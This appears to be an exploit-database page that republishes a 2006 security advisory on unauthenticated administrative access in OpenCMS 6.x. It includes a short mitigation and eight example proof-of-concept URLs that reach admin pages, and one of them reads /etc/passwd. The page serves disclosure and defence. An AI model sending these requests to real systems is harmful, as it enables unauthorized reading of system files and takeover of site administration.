header-logo
Suggest Exploit
vendor:
OpenCMS
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthorized Access
287
CWE
Product Name: OpenCMS
Affected Version From: 6.2.2001
Affected Version To: 06.03
Patch Exists: YES
Related CWE: N/A
CPE: a:opencms:opencms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

OpenCMS Unauthorized Access Vulnerabilities

OpenCMS is prone to multiple unauthorized-access vulnerabilities because it fails to properly authenticate users when performing administrative tasks. An attacker can exploit these issues to view, delete, and modify application data. This could aid in further attacks on the affected computer.

Mitigation:

Ensure that proper authentication is enforced when performing administrative tasks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19174/info

OpenCMS is prone to multiple unauthorized-access vulnerabilities because it fails to properly authenticate users when performing administrative tasks.

An attacker can exploit these issues to view, delete, and modify application data. This could aid in further attacks on the affected computer.

Versions 6.2.1, 6.2, 6.04, and 6.03 are vulnerable; prior versions may also be affected.

http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Flogfileview
http://www.example.com/opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp?filePath=/etc/passwd
http://www.example.com/opencms/opencms/system/workplace/editors/editor.jsp?resource=/index.jsp
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts%2Fwebusers/new
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fmodules%2Fmodules_import
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fdatabase%2Fimporthttp
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Fbroadcast
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts/users